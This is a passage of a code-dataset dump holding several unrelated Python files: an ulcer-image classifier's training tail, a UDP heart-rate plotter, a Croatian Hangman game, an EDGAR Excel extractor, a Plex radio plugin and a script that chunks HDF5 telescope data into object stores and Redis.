accuracy = 100 * correct/total\n epoch_loss = epoch_loss / n_val\n print(f'Accuracy validation on the images : {accuracy}')\n print(f'Validation loss in epoch {epoch+1}, loss : {epoch_loss}')\n print(f'TP : {TP}, TN : {TN}, FP : {FP}, FN : {FN}')\n print(f'Precision : {precision}, Recall : {recall}, Specificity : {specificity}')\n save_intermediate_val(epoch+1, num_exp, accuracy, epoch_loss, precision, recall, specificity,\\\n TP, TN, FP, FN)\n return epoch_loss\n\ndef split_data(num, seperate_by):\n try:\n os.mkdir(f\"./result/{num}\")\n os.mkdir(f\"./result/{num}/state_dict\")\n os.mkdir(f\"./result/{num}/data\")\n except OSError:\n pass\n if seperate_by == 'people':\n print('Seperated by people randomly..')\n no_people_split(src='../data/ulcer_detect/normal/',no=4500, num=num)\n ul_people_split(src='../data/ulcer_detect/ulcer/',ul=1000, num=num)\n elif seperate_by == 'instance':\n print('Seperated by instance randomly..')\n no_instance_split(src='../data/ulcer_detect/normal/',no=4500, num=num)\n ul_instance_split(src='../data/ulcer_detect/ulcer/',ul=1000, num=num)\n print('Finish')\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n args = get_args()\n\n my_npy_path = ''\n\n train_type = args.train\n\n assert train_type == 'TwoEncoder' or train_type == 'Mynpy', 'you must set TwoEncoder or Mynpy'\n\n net = VGG19(n_classes)\n print('parameters of model : ', count_parameters(net))\n net.to(device=device)\n\n dir_checkpoint = f'checkpoints/{args.num_exp}/'\n\n try:\n os.mkdir(dir_checkpoint)\n logging.info('Created checkpoint directory')\n except OSError:\n pass\n\n if train_type == 'Mynpy':\n net.load_state_dict(\n torch.load(my_npy_path, map_location=device)\n )\n logging.info(f'Model loaded from {my_npy_path}')\n\n try:\n main(net=net,\n 
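# The manual TP/FP/FN/TN tally in val_net above can be cross-checked with
# scikit-learn; this is an independent sketch, not part of the training script.
# Note val_net only guards the TP+FP==0 case -- recall and specificity can
# still divide by zero on degenerate batches, which sklearn handles for you.
import numpy as np
from sklearn.metrics import confusion_matrix, precision_score, recall_score

y_true = np.array([1, 0, 1, 1, 0, 0])   # assumed labels
y_pred = np.array([1, 0, 0, 1, 1, 0])   # assumed predictions
tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
print(tp, tn, fp, fn)                   # 2 2 1 1
print(precision_score(y_true, y_pred))  # 2/3
print(recall_score(y_true, y_pred))     # 2/3
print(tn / (fp + tn))                   # specificity = 2/3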
args=args,\n device=device,\n dir_checkpoint=dir_checkpoint\n )\n except KeyboardInterrupt:\n torch.save(net.state_dict(), 'INTERRUPTED.pth')\n logging.info('Saved interrupt')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n del net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631436448","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport serial\nimport json\nimport time\nimport random\n# Need socket to create a udp link\nimport socket\nBUFSIZE = 1024\n\n# 图像范围\ny_width = 100\nY_MID = 0\nx_width = 1000\n\n\"\"\"\ndata_list_len = 25\navg_level = 15\n\"\"\"\n\n# 滤波等级\ndata_list_len = 15\navg_level = 0\n\ntotal_avg_level = 60\nheart_circle = 6000\n\n# 串口设置\nportx = \"COM24\"\nbps = 115200\ntimex = 5\n#ser = serial.Serial(portx, bps, timeout=timex)\n\n# udp设置\n# Set server port\nip_port = ('192.168.1.125', 80)\n# Set udp\nserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# Set bind mod\nserver.bind(ip_port)\n\n\ndef udp_get_list(list_length, level):\n\n i = 0\n data_list = []\n while i < list_length:\n data, client_addr = server.recvfrom(BUFSIZE)\n data_str = data.decode('utf-8').encode('utf-8')\n print(data_str)\n server.sendto(data.upper(),client_addr)\n\n try:\n max30100_data = json.loads(data_str)\n IR_list = max30100_data[\"IR\"]\n print(IR_list)\n \n for IR in IR_list :\n data_list.append(IR)\n i = i + 1\n\n except:\n print(data_str)\n if level > 0:\n avg_list = avg_filter(data_list, level)\n return avg_list\n else:\n return data_list\n\n\n# 串口读取(不包含滤波)\ndef serial_get_list(list_length, level):\n i = 0\n data_list = []\n while i < list_length:\n serial_str = ser.readline().decode(\"utf-8\")\n\n try:\n max30100_data = json.loads(serial_str)\n IR = max30100_data[\"IR\"]\n # print(IR)\n data_list.append(IR)\n i = i + 1\n\n except:\n print(serial_str)\n if level > 0:\n avg_list = avg_filter(data_list, level)\n return avg_list\n else:\n return data_list\n\n# 均值滤波\n\n\ndef avg_filter(src_list, level):\n avg_list = []\n for i in range(len(src_list) - level + 1):\n temp = 0\n for j in range(level):\n temp += src_list[i + j]\n\n avg_list.append(temp / level)\n\n return avg_list\n\n# 波谷统计\n\n\ndef lowest_point(src_list):\n lowest_list = []\n last_low = 0\n\n temp_mid = (max(src_list) + min(src_list)) // 2\n\n for i in range(len(src_list) - 2):\n temp = src_list[i+1]\n if temp < 3000:\n break\n temp_previous = src_list[i]\n temp_next = src_list[i + 2]\n\n if temp < temp_previous and temp <= temp_next and temp < temp_mid:\n if i - last_low > 30:\n lowest_list.append(i)\n last_low = i\n return lowest_list\n\n\n# 主函数\ndef main():\n\n list_y = []\n for _ in range(x_width):\n # list_y.append(random.random())\n list_y.append(0)\n # print(list_y)\n\n temp_y = np.array(list_y)\n heart_rate = 0\n\n #now_time = time.perf_counter()\n while True:\n\n #temp_list = serial_get_list(data_list_len, avg_level)\n temp_list = udp_get_list(data_list_len, avg_level)\n\n for temp in temp_list:\n list_y.pop(0)\n list_y.append(temp)\n\n avg_list_y = avg_filter(list_y, total_avg_level)\n lowest_point_list = lowest_point(avg_list_y)\n if len(lowest_point_list) > 1:\n heart_rate = heart_circle // (\n lowest_point_list[1] - lowest_point_list[0])\n\n temp_y = np.array(avg_list_y)\n #temp_y = np.array(list_y)\n\n plt.clf()\n plt.title(\"Heart Rate:\" + str(heart_rate))\n plt.ylabel(\"IR data\")\n\n temp_x = np.arange(len(avg_list_y))\n 
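# avg_filter above is an O(n*level) Python loop; numpy's convolve in 'valid'
# mode computes the same moving average in one call. Independent sketch:
import numpy as np

def avg_filter_np(src, level):
    # mean over each window of `level` samples; output length n - level + 1,
    # matching avg_filter's output
    return np.convolve(src, np.ones(level) / level, mode='valid')

print(avg_filter_np([1, 2, 3, 4, 5], 2))  # [1.5 2.5 3.5 4.5]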
plt.plot(temp_x, temp_y)\n\n #plt.ylim(Y_MID - y_width,Y_MID + y_width)\n\n for temp in lowest_point_list:\n plt.plot(temp, avg_list_y[temp], \"ro\")\n\n plt.draw()\n plt.pause(0.001)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"213544017","text":"import turtle\nturtle.setup(1200, 600)\nprozor = turtle.Screen()\nprozor.title(\"Hangman.\")\nturtle.bgpic(\"slika.gif\")\nstrelica = turtle.getturtle()\nstrelica.penup()\nturtle.hideturtle()\nturtle.setposition(-50, 300)\nturtle.write(\"Hangman\", align=\"left\", font=(\"Arial\", 30))\nturtle.setposition(100, 200)\nturtle.write(\"Dobrodošli!\", align=\"left\", font=(\"Arial\", 15))\nturtle.setposition(100, 180)\nturtle.write(\"Ovo je igrica Hangman.Odaberi slovo i pogodi riječ.\", font=(\"Arial\", 15))\nturtle.setposition(100, 160)\nturtle.write(\"Sretno! :)\", font=(\"Arial\", 15))\n\n\nimport random\n\nrijec_iz_liste = \"false\"\n\nRijeci = [\"telefon\", \"majmun\", \"tigar\", \"medvjed\", \"vjeverica\", \"gepard\",\n \"laptop\", \"torba\", \"slika\", \"farmaceut\", \"cvijet\", \"zeko\", \"kalendar\",\n \"radijator\", \"zgrada\", \"priroda\", \"odmor\", \"planina\", \"dukserica\", \"garderoba\",\n \"klavir\", \"orkestar\", \"doktor\", \"fakultet\", \"automobil\", \"helikopter\", \"diploma\"]\n\nduzinaRijeci = len(Rijeci)\npozicija_rijeci = random.randint(0, duzinaRijeci)\nrijec_za_pogadjanje = (Rijeci[pozicija_rijeci])\nD = len(rijec_za_pogadjanje)\n\nA = \"\" # A je crtica\nfor i in rijec_za_pogadjanje:\n A = A + \"_ \"\nturtle.setposition(100, 0)\nturtle.write(A, font=70)\n\n\n# Funkcija za unos slova\ndef unos_slova():\n#Kreiramo varijablu za unos slova\n slovo = \"\"\n slovo = turtle.textinput(\"Hangman\", \"Unesite slovo ili riječ\")\n return slovo\n\n\n# Funkcija za provjeru unesenog slova\ndef provjera_slova(A):\n global greska\n global netacno\n turtle.clear()\n if len(slovo) > 1:\n if slovo == rijec_za_pogadjanje:\n return slovo\n else:\n greska += 1\n netacno.append(slovo)\n return A\n else:\n if slovo in rijec_za_pogadjanje:\n turtle.setposition(100, -60)\n turtle.write(\"Izabrana riječ sadrži: \", font=15)\n turtle.setposition(250, -60)\n turtle.write(slovo, font=15)\n A_temp = \"\"\n count = 0\n for i in rijec_za_pogadjanje:\n if i == slovo:\n A_temp = A_temp + i + \" \"\n else:\n A_temp += A[count * 2] + \" \"\n count = count + 1\n return A_temp\n else:\n turtle.setposition(100, -80)\n turtle.write(\"Izabrana riječ ne sadrži: \", font=15)\n turtle.setposition(280, -80)\n turtle.write(slovo, font=15)\n greska += 1\n netacno.append(slovo)\n return A\n\n\ngreska = 0\nnetacno = []\nkraj = \"false\"\nwhile kraj == \"false\":\n slovo = unos_slova()\n A = provjera_slova(A)\n turtle.setposition(100, 0)\n turtle.write(A, font=15)\n turtle.setposition(100, -120)\n turtle.write(\"Preostali pokušaji: \", font=15)\n turtle.setposition(100, -140)\n turtle.write(9 - greska, font=15)\n turtle.setposition(100, -160)\n turtle.write(\"Pogrešni pokušaji: \", font=15)\n turtle.setposition(100, -180)\n turtle.write(netacno, font=15)\n if not \"_\" in A:\n rijec_iz_liste == \"true\"\n turtle.setposition(-50, 0)\n turtle.write(\"Bravo!\", font=(\"Arial\", 70))\n ponovo = turtle.textinput(\"Hangman\", \"Da li želite igrati ponovo? 
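# Word selection above uses random.randint(0, duzinaRijeci); randint is
# inclusive on both ends, so it can return len(Rijeci) and raise IndexError.
# Safer equivalents (standalone sketch; the Croatian names are kept from the game):
import random
Rijeci = ["telefon", "majmun", "tigar"]  # abbreviated word list for illustration
rijec = Rijeci[random.randint(0, len(Rijeci) - 1)]  # inclusive upper bound fixed
rijec = random.choice(Rijeci)                       # or simply let choice() handle it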
(DA ili NE)\")\n if ponovo == \"NE\":\n kraj = \"true\"\n else:\n duzinaRijeci = len(Rijeci)\n pozicija_rijeci = random.randint(0, duzinaRijeci)\n rijec_za_pogadjanje = (Rijeci[pozicija_rijeci])\n D = len(rijec_za_pogadjanje)\n A = \"\" # A je crtica\n for i in rijec_za_pogadjanje:\n A = A + \"_ \"\n turtle.setposition(100, 0)\n turtle.write(A, font=70)\n if greska == 1:\n turtle.bgpic(\"slika2.gif\")\n if greska == 2:\n turtle.bgpic(\"slika3.gif\")\n if greska == 3:\n turtle.bgpic(\"slika4.gif\")\n if greska == 4:\n turtle.bgpic(\"slika5.gif\")\n if greska == 5:\n turtle.bgpic(\"slika6.gif\")\n if greska == 6:\n turtle.bgpic(\"slika7.gif\")\n if greska == 7:\n turtle.bgpic(\"slika8.gif\")\n if greska == 8:\n turtle.bgpic(\"slika9.gif\")\n if greska == 9:\n turtle.bgpic(\"slika10.gif\")\n turtle.penup()\n turtle.setposition(-50, 100)\n turtle.pendown()\n turtle.write(\"Izgubili ste!\", font=(\"Arial\", 70))\n\n\nturtle.exitonclick()","sub_path":"hangman2.py","file_name":"hangman2.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"274799052","text":"import pandas as pd\r\nimport csv\r\nimport re\r\nimport time\r\nimport glob\r\nimport logging\r\nimport sys,linecache\r\nimport os\r\nfrom functools import reduce\r\nimport psycopg2\r\nimport datetime as dt\r\nfrom dateutil.tz import gettz\r\nimport random\r\nfrom pympler import tracker\r\nfrom excel_util import ExcelUtil\r\nfrom config import ROOT_DIR,TEST_ROOT_DIR,JUST_TEST,CIK_FILE_PATH,EXCHANGES\r\nfrom config import JUST_TEST_ARRAY,TICK_CATEGORIES,LOG_FILE_PATH,LOGGER_NAME\r\nfrom config import METRIC_DATA_PATH\r\ntry:\r\n # Python2\r\n from cStringIO import StringIO \r\nexcept ImportError:\r\n # Python3\r\n from io import StringIO\r\n\r\ndef PrintException():\r\n cur_logger = logging.getLogger(LOGGER_NAME) \r\n exc_type, exc_obj, tb = sys.exc_info()\r\n f = tb.tb_frame\r\n lineno = tb.tb_lineno\r\n filename = f.f_code.co_filename\r\n linecache.checkcache(filename)\r\n line = linecache.getline(filename, lineno, f.f_globals)\r\n print('EXCEPTION IN ({}, LINE {} \"{}\"): {}'.format(\r\n filename, lineno, line.strip(), exc_obj))\r\n cur_logger.error(\"WORKER -- EXCEPTION IN ------\"+str(filename)+\" ----- lineno --\"+str(line.strip())+\" ACTUAL EXECEPTION \"+str(exc_obj))\r\n\r\nclass ExcelMaster(object):\r\n\r\n def __init__(self):\r\n logger = self.get_logger()\r\n logger.info(\" Logger is initialized in ExcelMaster \")\r\n\r\n def process_edgar_files(self,tick_array_by_cat,df_cik,as_of_tms_est):\r\n try:\r\n excel_util = ExcelUtil()\r\n with open(METRIC_DATA_PATH, 'r') as metric_config_file:\r\n metric_config = eval(metric_config_file.read())\r\n logger.info(\" metric_config \"+str(metric_config))\r\n company_code_array = excel_util.get_required_company_codes(df_cik,tick_array_by_cat)\r\n company_file_dict = excel_util.get_company_file_dict(company_code_array)\r\n for companyCode,excel_list in company_file_dict.items():\r\n logger.info(\"------------------------------- Started processs for company \"+str(companyCode)+ \" ----------------------------------------------- \")\r\n company_key_frames = []\r\n final_merged_df = pd.DataFrame()\r\n counter = 0\r\n for current_excel in excel_list:\r\n counter = counter + 1\r\n logger.info(\" Processing excel file no \"+str(counter)+ \" for company code \"+str(companyCode))\r\n ticker_df_array = []\r\n key_df = excel_util.find_keys_in_excel(current_excel,metric_config,companyCode)\r\n 
if(key_df.empty):\r\n pass\r\n else: \r\n company_key_frames.append(key_df)\r\n if(len(company_key_frames) > 0):\r\n final_merged_df = excel_util.merge_frames(company_key_frames,\"inner\",False)\r\n logger.info(\" final_merged_df for \"+str(companyCode)+\" are \"+str(final_merged_df.head())) \r\n if(final_merged_df.empty):\r\n logger.info(\" Final df is empty \")\r\n final_merged_df = self.check_for_latest_df(company_key_frames)\r\n if(final_merged_df.empty):\r\n logger.info(\" final Df is again enpty and does not have the latest 2017 data as well \") \r\n pass\r\n else: \r\n excel_util.run_insert(final_merged_df,str(companyCode),as_of_tms_est)\r\n logger.info(\"------------------------------- Process complete for company \"+str(companyCode)+ \" ----------------------------------------------- \")\r\n except Exception:\r\n logger.info(\" NO_DATA for \"+str(companyCode))\r\n PrintException()\r\n \r\n def check_for_latest_df(self,company_key_frames):\r\n for data_df in company_key_frames:\r\n col_names_array = list(data_df)\r\n if('YEAR_2017' in col_names_array):\r\n return data_df\r\n\r\n def load_cik(self):\r\n df_cik = pd.read_csv(CIK_FILE_PATH, sep='|')\r\n df_cik = df_cik.loc[df_cik['Exchange'].isin(EXCHANGES)]\r\n return df_cik\r\n\r\n def get_logger(self):\r\n logger = logging.getLogger(LOGGER_NAME)\r\n hdlr = logging.FileHandler(LOG_FILE_PATH)\r\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\r\n hdlr.setFormatter(formatter)\r\n logger.addHandler(hdlr) \r\n logger.setLevel(logging.INFO)\r\n return logger\r\n\r\n \r\nif __name__ == '__main__':\r\n tr = tracker.SummaryTracker()\r\n try:\r\n excel_master = ExcelMaster()\r\n excel_util = ExcelUtil()\r\n df_cik = excel_master.load_cik()\r\n logger = logging.getLogger(LOGGER_NAME)\r\n as_of_tms,as_of_tms_est = excel_util.get_time()\r\n logger.info(\" Define all constants which you will use going forward \")\r\n tick_array_by_cat = excel_util.fetch_ticks_by_category(TICK_CATEGORIES)\r\n if(JUST_TEST == 'Y'):\r\n tick_array_by_cat = JUST_TEST_ARRAY\r\n print(tick_array_by_cat)\r\n logger.info(\" We are going to run by category for companies --> \"+str(len(tick_array_by_cat)))\r\n excel_master.process_edgar_files(tick_array_by_cat,df_cik,as_of_tms_est)\r\n tr.print_diff()\r\n #logger.info(\" Total Length of dict is \"+str(len(valid_ticker_excel_dict)))\r\n except Exception as e:\r\n PrintException()\r\n finally:\r\n tr.print_diff()","sub_path":"coindab_extractor/edgar/excel_master.py","file_name":"excel_master.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"181593814","text":"import tensorflow as tf\n\na = tf.constant(1, shape=[1,3,2,2])\nb = tf.constant(3, shape=[1,3,2,2])\nc = b - a\nd = tf.square(c)\ne = tf.reduce_sum(d)\n\nsess = tf.InteractiveSession()\nprint(a)\nprint(b)\n\nprint(sess.run(e))","sub_path":"02.TensorFlow/Others/math_funcs.py","file_name":"math_funcs.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"43204033","text":"NAME = 'NL Internet Radio'\nART = 'art-default.jpg'\nICON = 'icon-default.png'\n\n####################################################################################################\ndef Start():\n\n\tObjectContainer.title1 = NAME\n\tObjectContainer.art = R(ART)\n\tDirectoryObject.thumb = R(ICON)\n\n\tHTTP.CacheTime = 
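# get_logger() in ExcelMaster above attaches a new FileHandler on every call,
# so repeated calls duplicate each log line. An idempotent variant (sketch,
# assuming the same LOG_FILE_PATH/LOGGER_NAME constants from config):
import logging

def get_logger(name='excel_master', path='excel_master.log'):
    logger = logging.getLogger(name)
    if not logger.handlers:  # configure the handler only once per process
        hdlr = logging.FileHandler(path)
        hdlr.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
        logger.addHandler(hdlr)
        logger.setLevel(logging.INFO)
    return logger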
0\n\n####################################################################################################\n@handler('/music/nlinternetradio', NAME, thumb=ICON, art=ART)\ndef MainMenu():\n\n\toc = ObjectContainer()\n\tjson_obj = JSON.ObjectFromString(Resource.Load('radio.json'))\n\n\tfor station in json_obj:\n\n\t\tif station['ext'] not in ('aac', 'mp3'):\n\t\t\tcontinue\n\n\t\tif 'thumb' in station:\n\t\t\tthumb = station['thumb']\n\t\telse:\n\t\t\tthumb = ''\n\n\t\toc.add(CreateTrackObject(\n\t\t\ttitle = station['title'],\n\t\t\turl = station['url'],\n\t\t\text = station['ext'],\n\t\t\tthumb = thumb\n\t\t))\n\n\treturn oc\n\n####################################################################################################\n@route('/music/nlinternetradio/track')\ndef CreateTrackObject(title, url, ext, thumb, include_container=False):\n\n\tif ext == 'aac':\n\t\tcontainer = 'aac'\n\t\taudio_codec = AudioCodec.AAC\n\telse:\n\t\tcontainer = 'mp3'\n\t\taudio_codec = AudioCodec.MP3\n\n\ttrack_obj = TrackObject(\n\t\tkey = Callback(CreateTrackObject, title=title, url=url, ext=ext, thumb=thumb, include_container=True),\n\t\trating_key = url,\n\t\ttitle = title,\n\t\tthumb = Resource.ContentsOfURLWithFallback(url=thumb, fallback=ICON),\n\t\titems = [\n\t\t\tMediaObject(\n\t\t\t\tparts = [\n\t\t\t\t\tPartObject(key=Callback(Play, url=url, extension=ext))\n\t\t\t\t],\n\t\t\t\tcontainer = container,\n\t\t\t\taudio_codec = audio_codec,\n\t\t\t\taudio_channels = 2\n\t\t\t)\n\t\t]\n\t)\n\n\tif include_container:\n\t\treturn ObjectContainer(objects=[track_obj])\n\telse:\n\t\treturn track_obj\n\n####################################################################################################\n@route('/music/nlinternetradio/play.{extension}')\ndef Play(url, extension):\n\n\treturn Redirect(url)\n","sub_path":"Contents/Code/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"97488776","text":"#!/usr/bin/env python\n\n################################################################################\n# Copyright (c) 2017-2018, National Research Foundation (Square Kilometre Array)\n#\n# Licensed under the BSD 3-Clause License (the \"License\"); you may not use\n# this file except in compliance with the License. 
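# MainMenu() in the radio channel above iterates a list of station dicts with
# 'title', 'url', 'ext' and an optional 'thumb', and skips anything that is
# not aac/mp3. The bundled radio.json it loads is therefore presumably shaped
# like this (illustrative entries only, not the plugin's real station list):
import json
radio_json = json.dumps([
    {"title": "Example FM", "url": "http://example.com/stream.mp3", "ext": "mp3"},
    {"title": "Example AAC", "url": "http://example.com/stream.aac", "ext": "aac",
     "thumb": "http://example.com/logo.png"},
])
for station in json.loads(radio_json):
    assert station["ext"] in ("aac", "mp3")  # anything else is skipped by MainMenu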
You may obtain a copy\n# of the License at\n#\n# https://opensource.org/licenses/BSD-3-Clause\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n\"\"\"Simple script to take an HDF5 file and chunk it into objects.\n\nThis also populates a specified (or managed) Redis instance to hold\ntelescope state and other metadata.\n\nThe primary use is for testing the coming katdal access layer that will\nwrap up such an object+Redis dataset and provide the usual standard access.\n\nObjects are stored in chunks split over time and frequency but not baseline.\nThe chunking is chosen to produce objects with sizes on the order of 1 MB.\nThe schema used is as follows:\n\n /[/__<...>]\n\n - obj_base_name: for S3 this defaults to '//'\n - dataset_name: 'correlator_data' / 'weights' / 'flags' / etc.\n - indexN: chunk start index along N'th dimension (suppressed if 1 chunk only)\n\nThe following useful object parameters are stored in telstate, prefixed by\n'..':\n\n - ceph_pool: the name of the CEPH pool used\n - ceph_conf: copy of ceph.conf used to connect to target CEPH cluster\n - s3_endpoint: endpoint URL of S3 object store\n - : dict containing chunk info (dtype, shape and chunks)\n\"\"\"\n\nimport struct\nimport logging\nimport sys\nimport time\nimport shlex\nimport subprocess\nfrom itertools import product\n\nimport numpy as np\nimport katdal\nfrom katdal.chunkstore_rados import RadosChunkStore\nfrom katdal.chunkstore_s3 import S3ChunkStore\nfrom katdal.chunkstore_dict import DictChunkStore\nimport katsdptelstate\nimport katsdpservices\nimport dask\nimport dask.array as da\nfrom dask.diagnostics import ProgressBar\n\n\nlogging.basicConfig()\n\nlogger = logging.getLogger('h5toobj')\nlogger.setLevel(logging.INFO)\n\n\ndef parse_args():\n parser = katsdpservices.ArgumentParser()\n parser.add_argument('file', type=str, nargs=1,\n metavar='FILE', help='HDF5 file to process')\n parser.add_argument('--base-name', type=str, metavar='BASENAME',\n help='Base name for objects (should include bucket '\n 'name for S3 object store)')\n parser.add_argument('--obj-size', type=float, default=2.0,\n help='Target object size in MB')\n parser.add_argument('--max-dumps', type=int, default=0,\n help='Number of dumps to process. Default is all.')\n parser.add_argument('--ceph-conf', type=str, default=\"/etc/ceph/ceph.conf\",\n metavar='CEPHCONF',\n help='Ceph configuration file used for cluster connect')\n parser.add_argument('--ceph-pool', type=str, metavar='POOL',\n help='Ceph pool to use for object storage')\n parser.add_argument('--ceph-keyring',\n help='Ceph keyring to use for object storage')\n parser.add_argument('--s3-url', type=str,\n help='S3 endpoint URL (includes leading \"http\")')\n parser.add_argument('--redis', type=str,\n help='Redis host to connect to as Telescope State. 
'\n 'Default is to start a new local instance.')\n parser.add_argument('--redis-port', type=int, default=6379,\n help='Port to use when connecting to Redis instance '\n '(or creating a new one)')\n parser.add_argument('--redis-only', action='store_true',\n help='Only (re)build Redis DB - no object creation')\n parser.add_argument('--obj-only', action='store_true',\n help='Only populate object store - no Redis update')\n args = parser.parse_args()\n if not args.redis_only:\n use_s3 = args.s3_url is not None\n use_rados = args.ceph_pool is not None\n if use_rados and use_s3:\n parser.error('Please specify either --ceph-pool or --s3-*')\n if args.base_name is None:\n args.base_name = args.file[0].split(\".\")[0]\n return args\n\n\ndef redis_gen_proto(*args):\n proto = ['*%d\\r\\n' % (len(args),)]\n proto += ['$%d\\r\\n%s\\r\\n' % (len(arg), arg) for arg in args]\n return ''.join(proto)\n\n\ndef redis_bulk_str(r_str, host, port):\n bulk_cmd = \"redis-cli --pipe -h {} -p {}\".format(host, port)\n bulk_redis = subprocess.Popen(shlex.split(bulk_cmd), stdin=subprocess.PIPE,\n stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n (retout, reterr) = bulk_redis.communicate(input=r_str)\n if bulk_redis.returncode:\n logger.error(\"Failed on bulk key insert. Retcode: %d, Stderr: %s, \"\n \"Stdout: %s\", bulk_redis.returncode, retout, reterr)\n sys.exit()\n logger.debug(\"Bulk insert r_str of len %d completed: %s\", len(r_str), retout)\n\n\ndef generate_chunks(shape, dtype, target_object_size, dims_to_split=(0, 1)):\n \"\"\"\"\"\"\n dataset_size = np.prod(shape) * dtype.itemsize\n num_chunks = np.ceil(dataset_size / float(target_object_size))\n chunks = [(s,) for s in shape]\n for dim in dims_to_split:\n if dim >= len(shape):\n continue\n if num_chunks > 0.5 * shape[dim]:\n chunk_sizes = (1,) * shape[dim]\n else:\n items = np.arange(shape[dim])\n chunk_indices = np.array_split(items, num_chunks)\n chunk_sizes = tuple([len(chunk) for chunk in chunk_indices])\n chunks[dim] = chunk_sizes\n num_chunks = np.ceil(num_chunks / len(chunk_sizes))\n return tuple(chunks)\n\n\ndef dsk_from_chunks(chunks, out_name):\n keys = list(product([out_name], *[range(len(bds)) for bds in chunks]))\n slices = da.core.slices_from_chunks(chunks)\n return zip(keys, slices)\n\n\nif __name__ == '__main__':\n args = parse_args()\n try:\n f = katdal.open(args.file[0])\n h5_file = f.file\n except Exception:\n logger.exception(\"Failed to open specified HDF5 file\")\n sys.exit()\n try:\n vis = h5_file['Data/correlator_data']\n except KeyError:\n logger.exception(\"This does not appear to be a valid MeerKAT HDF5 file\")\n sys.exit()\n\n if args.obj_only:\n redis_endpoint = args.redis = redis_host = ''\n elif args.redis is None:\n logger.info(\"Launching local Redis instance\")\n try:\n launch_cmd = \"/usr/bin/redis-server --port {}\".format(args.redis_port)\n local_redis = subprocess.Popen(shlex.split(launch_cmd),\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE)\n except OSError:\n launch_cmd = \"/usr/local/bin/redis-server --port {}\".format(args.redis_port)\n local_redis = subprocess.Popen(shlex.split(launch_cmd),\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE)\n time.sleep(3)\n if local_redis.poll():\n logger.error(\"Failed to launch local Redis instance, terminating. 
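# Worked example of the chunking arithmetic in generate_chunks() above (an
# independent check with made-up numbers): float32 data of shape
# (100, 4096, 40) is 65,536,000 bytes, so a 2 MiB target needs
# ceil(65536000 / 2097152) = 32 chunks. Splitting axis 0 with
# np.array_split(np.arange(100), 32) yields pieces of 3-4 dumps, which already
# meets the target, so the frequency axis is left whole:
import numpy as np
sizes = tuple(len(c) for c in np.array_split(np.arange(100), 32))
print(sizes)       # four pieces of 4 followed by twenty-eight pieces of 3
print(sum(sizes))  # 100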
%s\",\n local_redis.communicate())\n sys.exit()\n logger.info(\"Local Redis instance launched successfully\")\n redis_host = 'localhost'\n redis_endpoint = '{}:{}'.format(redis_host, args.redis_port)\n else:\n redis_host = args.redis\n redis_endpoint = '{}:{}'.format(redis_host, args.redis_port)\n ts = katsdptelstate.TelescopeState(redis_endpoint)\n logger.info(\"Connected to Redis on %s. DB has %d existing keys\",\n redis_endpoint, len(ts.keys()))\n\n r_str = \"\"\n for attr in h5_file['TelescopeState'].attrs:\n r_str += redis_gen_proto(\"SET\", attr, h5_file['TelescopeState'].attrs[attr])\n if redis_endpoint:\n redis_bulk_str(r_str, redis_host, args.redis_port)\n\n if not args.obj_only:\n for d_count, dset in enumerate(h5_file['TelescopeState'].keys()):\n st = time.time()\n r_str = \"\"\n d_val = h5_file['TelescopeState'][dset].value\n # much quicker to read it first and then iterate\n for (timestamp, pval) in d_val:\n packed_ts = struct.pack('>d', float(timestamp))\n r_str += redis_gen_proto(\"ZADD\", str(dset), \"0\", packed_ts + pval)\n bss = time.time()\n if redis_endpoint:\n redis_bulk_str(r_str, redis_host, args.redis_port)\n logger.info(\"Added %d items in %gs to key %s. Bulk insert time: %g\",\n len(d_val), time.time() - st, dset, time.time() - bss)\n logger.info(\"Added %d ranged keys to TelescopeState\", d_count + 1)\n\n if args.redis_only and args.redis is None:\n logger.warning(\"Terminating locally launched redis instance \"\n \"(also saves telstate to local dump.rdb)\")\n try:\n cli_cmd = \"/usr/bin/redis-cli -p {} SHUTDOWN SAVE\".format(args.redis_port)\n subprocess.call(shlex.split(cli_cmd))\n except OSError:\n cli_cmd = \"/usr/local/bin/redis-cli -p {} SHUTDOWN SAVE\".format(args.redis_port)\n subprocess.call(shlex.split(cli_cmd))\n local_redis.terminate()\n\n if args.redis_only:\n logger.warning(\"Building Redis DB only - no data will be written...\")\n sys.exit(0)\n\n program_block = f.experiment_id\n stream = 'sdp_l0'\n ts_pbs = ts.view(program_block + '.' + stream)\n max_dumps = args.max_dumps if args.max_dumps > 0 else vis.shape[0]\n\n use_rados = args.ceph_pool is not None\n if use_rados:\n obj_store = RadosChunkStore.from_config(args.ceph_conf, args.ceph_pool,\n args.ceph_keyring)\n pool_stats = obj_store.ioctx.get_stats()\n logger.info(\"Connected to pool %s. 
